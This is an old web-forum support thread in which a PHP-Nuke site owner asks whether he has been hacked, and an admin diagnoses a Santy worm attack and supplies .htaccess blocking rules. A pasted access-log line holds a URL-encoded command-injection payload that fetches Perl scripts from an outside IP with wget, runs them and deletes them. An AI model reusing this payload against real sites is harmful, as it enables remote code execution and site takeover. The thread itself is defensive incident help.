Have I been Hacked???

Client Joined: Feb 18, 2004 Posts: 22 Location: Israel

Bellow is a partial portion of my logs on my server, I really wanted to know if there is anything strange here. On the last 2 days I lost total control of my site. Don't know where to start, the modules myaccount, protector, and monitor 2.5 I can't get in could someone give a lead here???

If there is a need I'll PM the link and give access to admin area to check it out.

Please help me!!!!

"GET /themes/israblue/style/style.css HTTP/1.1" 304 - "http://www.xxx.com/" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 9 Cool

" 64.235.234.123 - - [20/May/2005:11:38:59 -0700] "GET /article-page-16.html?rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;
mkdir%20.temp;cd%20.temp;wget%20http://61.85.234.215/.zk/msn.txt;wget%20http://61.85.234.215
/.zk/coll.txt;wget%20http://61.85.234.215/.zk/g.txt;perl%20msn.txt;rm%20msn.txt;perl%20coll.txt;rm%20coll.txt;
perl%20g.txt;rm%20g.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73
%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68
%5D%29.%2527'; HTTP/1.1" 200 261567 "-" "LWP::Simple/5.803" 200.218.169.2

TIA,

JLart

Site Admin/Owner Joined: Aug 27, 2002 Posts: 17088

That's a Santy Worm exploit. Are you using NukeSentinel(tm)?

Paste this code in your .htaccess file

Code:

RewriteEngine on


#Check for Santy Worms and redirect them to a fake page


RewriteCond %{HTTP_USER_AGENT} ^LWP                   [NC,OR]


RewriteCond %{REQUEST_URI} ^visualcoders              [NC,OR]


RewriteCond %{QUERY_STRING} rush=([^&]+)              [NC,OR]


RewriteCond %{REQUEST_URI} ^envidiosos                [NC,OR]


RewriteCond %{REQUEST_URI} ^civa                      [NC,OR]


#variant-6 redirect all inner http:// request


RewriteCond %{QUERY_STRING} ^(.*)http://(.*)            [NC,OR]


#variant-7 redirect all inner http request regardless if encoded


RewriteCond %{QUERY_STRING} ^(.*)http%3A%2F%2F(.*)      [NC,OR]


#New one 2-2-2005


RewriteCond %{QUERY_STRING} q=emessenger                 [NC]


RewriteRule ^.*$ http://127.0.0.1 [R,L]

Next, use phpMyAdmin and edit your nuke_authors table. Delete any records that are not legitimate and modify the legitimate passwords being sure to select MD5 in the password drop down box. You would also be advised to edit the nuke_users table for those same names.

Posted: Sat May 21, 2005 2:13 am

Hi Raven,

Thanks again for you knowledgable thoughts. Well to answer your first question I don't have Sentinel because the first time I tried to put one of the first version for nuke 7.3 I got locked out of my admin and since then I did'nt try and opted for protector but I will though. Wink

.

Regarding your instructions above, I did made a prior check on those tables and the users that were there are the nomal ones. Do you think I should change those too??? the mod rewrite part I already changed and also verified the users table nothing strange.

The only thing that is bothereing me is that, I can't really pin point where this worm comes from, yesterday there were some funny things happening on my cpanel and FTP accounts they simply keep changing.
Is there a possibility tha the host has problems and not passing it on to the users???

10x again,

JLart

Posted: Sat May 21, 2005 6:41 am

Lart,

I'm sure you'll understand Smile

I have to move those last 2 posts as they gave the public the ability to hack other sites. That is almost assuredly how you were hacked. Get NukeSentinel(TM) installed!

Posted: Sat May 21, 2005 7:59 am

Ok Raven really sorry for the posts,

they did get me down for the time being, unfortunatelly I have to travel today and don't have the time to take care of this. But thanks anyways.

I really don't understand why these people waste their time and talent to be so destructive and mess up somebody else work. One think is for sure they did'nt get their names posted in the site.

I really appreciate the help and once again sorry for the posts.

JLart